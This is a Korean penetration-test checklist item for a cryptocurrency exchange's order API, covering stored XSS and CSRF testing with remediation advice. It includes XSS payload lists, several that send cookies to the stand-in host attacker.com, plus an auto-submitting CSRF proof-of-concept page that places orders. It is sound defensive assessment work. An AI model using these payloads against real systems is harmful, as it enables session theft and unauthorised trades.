================================================================================
[VCE-EX-01] XSS/CSRF 공격 가능성
도메인: exchange
================================================================================

1. 진단 항목 개요
   - 항목명   : XSS(Cross-Site Scripting) 및 CSRF(Cross-Site Request Forgery) 공격 가능성
   - 번호     : VCE-EX-01
   - 위험도   : Critical
   - 설명     : 주문 생성 API의 assetType 필드에 스크립트 페이로드가 삽입되어 다른 사용자의
                브라우저에서 실행될 가능성(Stored XSS), 및 CSRF 토큰 없이 주문 생성 요청이
                수락될 가능성을 검증한다. Critical로 분류하는 이유는 공격 성공 시 세션 탈취,
                계정 탈취, 임의 주문 생성 등 금전적 피해로 직결되기 때문이다.

--------------------------------------------------------------------------------

2. 대상 기능 & 엔드포인트
   - 기능 설명  : 암호화폐 매수/매도 주문 생성 기능. assetType 필드에 코인 종류를 지정하며
                  이 값이 주문 목록 UI에 그대로 렌더링될 경우 XSS 취약점이 발생할 수 있다.

   [주문 생성]
   - 로컬  : http://localhost:8080/api/orders
   - 운영  : https://vceapp.com/api/orders
   - 메서드: POST
   - 인증  : JWT Bearer Token 필요 (Authorization 헤더)

   [주문 목록 조회]
   - 로컬  : http://localhost:8080/api/orders
   - 운영  : https://vceapp.com/api/orders
   - 메서드: GET
   - 인증  : JWT Bearer Token 필요

   [체결 내역 / 공개 노출 가능 경로]
   - 로컬  : http://localhost:8080/api/orders/market
   - 운영  : https://vceapp.com/api/orders/market
   - 메서드: GET
   - 인증  : 불명 (공개 여부 확인 필요)

--------------------------------------------------------------------------------

3. 취약점 원리 (Why this works)

   [Stored XSS 원리]
   Stored XSS(저장형 XSS)는 공격자가 악의적인 스크립트를 서버 측 데이터베이스에 저장하고,
   다른 사용자가 해당 데이터를 조회할 때 브라우저가 스크립트를 실행하는 공격이다. exchange
   도메인의 주문 생성 시 assetType 필드는 사용자 입력을 그대로 DB에 저장한다. 만약 주문
   목록을 렌더링하는 프론트엔드 컴포넌트가 innerHTML 또는 dangerouslySetInnerHTML을 통해
   해당 값을 출력하면, 저장된 스크립트가 모든 조회 사용자의 브라우저에서 실행된다.

   [CSRF 원리]
   CSRF(사이트 간 요청 위조)는 인증된 사용자가 의도하지 않은 요청을 서버에 전송하도록
   공격자가 유도하는 공격이다. 서버가 요청 출처(Origin/Referer)를 검증하지 않거나 CSRF
   토큰을 요구하지 않으면, 공격자가 작성한 악성 페이지에서 피해자의 세션 쿠키를 이용해
   주문 생성, 출금 등의 요청을 자동으로 전송할 수 있다.

   [JWT 기반 인증에서의 CSRF 위험]
   JWT를 LocalStorage에 저장하는 경우 XSS로 토큰을 탈취할 수 있으며, HttpOnly 쿠키에
   저장하는 경우 CSRF 공격의 위협이 증가한다. VCE exchange가 JWT를 쿠키로 관리하는 경우
   CSRF 방어 메커니즘(SameSite 속성, CSRF 토큰 헤더)이 반드시 필요하다.

   [공격 성립 조건]
   - assetType 필드가 서버에서 HTML 이스케이프 처리 없이 저장됨
   - 프론트엔드가 조회 시 해당 필드를 raw HTML로 렌더링함
   - CSRF의 경우: 서버가 Origin/Referer 헤더를 검증하지 않고, CSRF 토큰을 요구하지 않음
   - SameSite=None 또는 SameSite 미설정 쿠키 사용 시 CSRF 위험 증가

--------------------------------------------------------------------------------

4. 테스트 절차 (Step-by-step)

   [사전 준비]
   - Burp Suite 실행 후 브라우저 프록시 설정 (127.0.0.1:8080)
   - 테스트 계정으로 로그인: test@vce.com / test1234
   - 로그인 후 JWT 토큰 획득 (응답 헤더 또는 쿠키에서 확인)
   - Burp Suite > Proxy > Intercept ON 설정
   - 별도 피해자 계정 준비: victim@vce.com (있는 경우) 또는 admin@vce.com

   ---[ STEP 1: 정상 주문 요청 파악 ]---
   먼저 정상적인 주문 생성 요청을 캡처하여 파라미터 구조를 파악한다.

   정상 요청 예시:
   --- HTTP 요청 예시 ---
   POST /api/orders HTTP/1.1
   Host: localhost:8080
   Content-Type: application/json
   Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
   Origin: http://localhost:5173
   Referer: http://localhost:5173/exchange

   {
     "assetType": "BTC",
     "orderType": "BUY",
     "price": 50000000,
     "amount": 0.001
   }
   ---

   ---[ STEP 2: Reflected XSS 테스트 ]---
   assetType 필드에 기본 XSS 페이로드를 삽입하여 서버 응답에 그대로 반사되는지 확인한다.

   --- HTTP 요청 예시 ---
   POST /api/orders HTTP/1.1
   Host: localhost:8080
   Content-Type: application/json
   Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
   Origin: http://localhost:5173

   {
     "assetType": "<script>alert('XSS-EX-01')</script>",
     "orderType": "BUY",
     "price": 50000000,
     "amount": 0.001
   }
   ---

   ---[ STEP 3: Stored XSS 테스트 - 기본 페이로드 ]---
   스크립트가 저장된 후 주문 목록 GET 요청 시 실행되는지 확인한다.

   --- HTTP 요청 예시 (페이로드 저장) ---
   POST /api/orders HTTP/1.1
   Host: localhost:8080
   Content-Type: application/json
   Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...

   {
     "assetType": "<img src=x onerror=alert(document.cookie)>",
     "orderType": "BUY",
     "price": 1,
     "amount": 0.001
   }
   ---

   저장 후 GET /api/orders 로 목록 조회하여 XSS 발동 여부 확인:
   --- HTTP 요청 예시 (목록 조회) ---
   GET /api/orders HTTP/1.1
   Host: localhost:8080
   Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
   ---

   ---[ STEP 4: Stored XSS - 고급 페이로드 (세션 탈취) ]---
   단순 alert 대신 공격자 서버로 쿠키를 전송하는 페이로드를 사용한다.
   (실제 테스트 환경에서는 공격자 서버 대신 Burp Collaborator를 사용)

   --- HTTP 요청 예시 ---
   POST /api/orders HTTP/1.1
   Host: localhost:8080
   Content-Type: application/json
   Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...

   {
     "assetType": "<script>new Image().src='http://attacker.com/steal?c='+encodeURIComponent(document.cookie)</script>",
     "orderType": "SELL",
     "price": 1,
     "amount": 0.001
   }
   ---

   ---[ STEP 5: HTML 이벤트 핸들러 기반 페이로드 ]---
   <script> 태그가 필터링되는 경우 이벤트 핸들러를 이용한 우회 시도:

   페이로드 목록:
   - <img src=x onerror=alert(1)>
   - <svg onload=alert(1)>
   - <body onload=alert(1)>
   - <iframe src=javascript:alert(1)>
   - <input autofocus onfocus=alert(1)>
   - <details open ontoggle=alert(1)>
   - <video src=x onerror=alert(1)>
   - javascript:alert(document.domain)
   - <a href="javascript:alert(1)">click</a>
   - "><script>alert(1)</script>
   - '><script>alert(1)</script>
   - \u003cscript\u003ealert(1)\u003c/script\u003e

   ---[ STEP 6: CSRF 토큰 검증 테스트 ]---
   CSRF 방어 메커니즘 존재 여부를 확인한다.
   X-CSRF-Token 헤더 없이 주문 생성 요청을 전송해본다.

   --- HTTP 요청 예시 (CSRF 토큰 누락) ---
   POST /api/orders HTTP/1.1
   Host: localhost:8080
   Content-Type: application/json
   Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
   Origin: https://evil-attacker.com
   Referer: https://evil-attacker.com/csrf-attack.html

   {
     "assetType": "BTC",
     "orderType": "BUY",
     "price": 50000000,
     "amount": 1.0
   }
   ---

   ---[ STEP 7: CSRF HTML PoC 생성 ]---
   피해자가 악성 페이지를 방문하면 자동으로 주문이 생성되는 PoC 페이지:

   <!-- csrf_poc.html -->
   <html>
   <body onload="document.csrf_form.submit()">
   <form name="csrf_form" action="http://localhost:8080/api/orders" method="POST"
         enctype="application/json">
     <input type="hidden" name="assetType" value="BTC">
     <input type="hidden" name="orderType" value="BUY">
     <input type="hidden" name="price" value="50000000">
     <input type="hidden" name="amount" value="1.0">
   </form>
   </body>
   </html>

   ---[ STEP 8: Origin 헤더 변조 테스트 ]---
   서버가 Origin 헤더를 CORS 정책으로 검증하는지 확인:

   --- HTTP 요청 예시 ---
   POST /api/orders HTTP/1.1
   Host: localhost:8080
   Content-Type: application/json
   Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
   Origin: https://evil.com

   {
     "assetType": "ETH",
     "orderType": "BUY",
     "price": 3000000,
     "amount": 1.0
   }
   ---
   응답에 Access-Control-Allow-Origin: https://evil.com 이 포함되면 CORS 취약

   공격 페이로드 목록 (XSS):
   1. <script>alert('VCE-XSS-01')</script>
   2. <img src=x onerror=alert(document.cookie)>
   3. <svg/onload=alert(1)>
   4. <script>fetch('https://attacker.com/?c='+btoa(document.cookie))</script>
   5. <script>document.location='https://attacker.com/?s='+document.cookie</script>
   6. <iframe src="javascript:parent.document.body.innerHTML='<h1>Hacked</h1>'">
   7. <script>var x=new XMLHttpRequest();x.open('GET','http://localhost:8080/api/users/me');x.setRequestHeader('Authorization','Bearer '+localStorage.getItem('token'));x.send();</script>

--------------------------------------------------------------------------------

5. 취약 여부 판단 기준

   [XSS 취약 여부]
   ✅ 취약 (Vulnerable):
      - POST 요청 후 GET /api/orders 응답에 페이로드가 HTML 인코딩 없이 포함됨
      - 브라우저에서 주문 목록 페이지 조회 시 alert 또는 스크립트가 실행됨
      - 응답 Content-Type이 text/html이면서 페이로드가 그대로 반환됨
      - document.cookie 값이 외부로 전송됨 (Burp Collaborator로 확인)

   ✗ 안전 (Not Vulnerable):
      - 응답에서 < > & " ' 등이 &lt; &gt; &amp; &quot; &#x27; 로 인코딩됨
      - 서버가 assetType을 허용된 값(BTC, ETH 등) 외 입력 시 400 Bad Request 반환
      - JSON 응답에서 페이로드가 문자열로만 처리되고 HTML 렌더링되지 않음

   [CSRF 취약 여부]
   ✅ 취약 (Vulnerable):
      - Origin: https://evil.com 으로 전송한 요청이 200 OK로 처리됨
      - CSRF 토큰 없이 전송한 요청이 정상 처리됨
      - Access-Control-Allow-Origin: * 또는 공격자 도메인이 응답 헤더에 포함됨

   ✗ 안전 (Not Vulnerable):
      - CSRF 토큰 없는 요청에 403 Forbidden 반환
      - Origin 헤더 검증으로 허용된 도메인이 아닌 경우 차단
      - SameSite=Strict 쿠키 정책 적용으로 크로스사이트 요청 시 쿠키 미전송

--------------------------------------------------------------------------------

6. 예상 취약 포인트 (코드 위치)

   [Exchange 프론트엔드]
   - 주문 목록 렌더링 컴포넌트 (OrderList.tsx 또는 유사 파일)
     -> assetType 값을 dangerouslySetInnerHTML 또는 innerHTML로 렌더링 시 XSS 발생
     -> React의 경우 {assetType} 은 안전하지만 dangerouslySetInnerHTML={{ __html: assetType }}은 취약

   [Community 도메인 확인 완료]
   - CommunityDetail.tsx:323 -> dangerouslySetInnerHTML 사용 확인됨
     -> Exchange 도메인에도 동일 패턴이 적용되었는지 확인 필요

   [백엔드]
   - OrderController.java (POST /api/orders 처리) -> 입력값 검증 없이 DB 저장 가능성
   - OrderService.java -> assetType 필드 저장 전 sanitization 여부
   - SecurityConfig.java -> CORS 설정에서 허용 Origin 범위 확인
   - SecurityConfig.java -> CSRF 보호 비활성화 여부 (csrf().disable() 설정 확인)

--------------------------------------------------------------------------------

7. 권고 조치

   - [XSS 방어] 프론트엔드에서 dangerouslySetInnerHTML 사용을 금지하고, 사용자 입력 데이터는
     반드시 React의 JSX 표현식({value}) 또는 DOMPurify 라이브러리를 통해 렌더링한다.
     백엔드에서도 OWASP Java Encoder 또는 Spring의 HtmlUtils.htmlEscape()를 통해
     출력 시 HTML 인코딩을 적용한다.

   - [입력값 검증] assetType 필드는 서버 측에서 허용된 값(BTC, ETH, XRP 등) 만을 허용하는
     allowlist(화이트리스트) 검증을 적용하고, 그 외 값은 400 Bad Request를 반환한다.
     @Pattern(regexp = "^[A-Z]{2,10}$") 형태의 Bean Validation을 활용한다.

   - [CSRF 방어] Spring Security의 CSRF 보호를 활성화하거나, JWT를 사용하는 경우
     Authorization 헤더 방식(LocalStorage + Bearer)으로 일관되게 사용하되,
     HttpOnly 쿠키 사용 시 SameSite=Strict 또는 SameSite=Lax 속성을 반드시 설정한다.

   - [CORS 강화] SecurityConfig에서 allowedOrigins를 운영 도메인으로 엄격하게 제한하고
     allowCredentials(true) 사용 시 와일드카드(*)를 허용하지 않는다.
     응답 헤더에 Vary: Origin을 포함하여 캐시 오염을 방지한다.
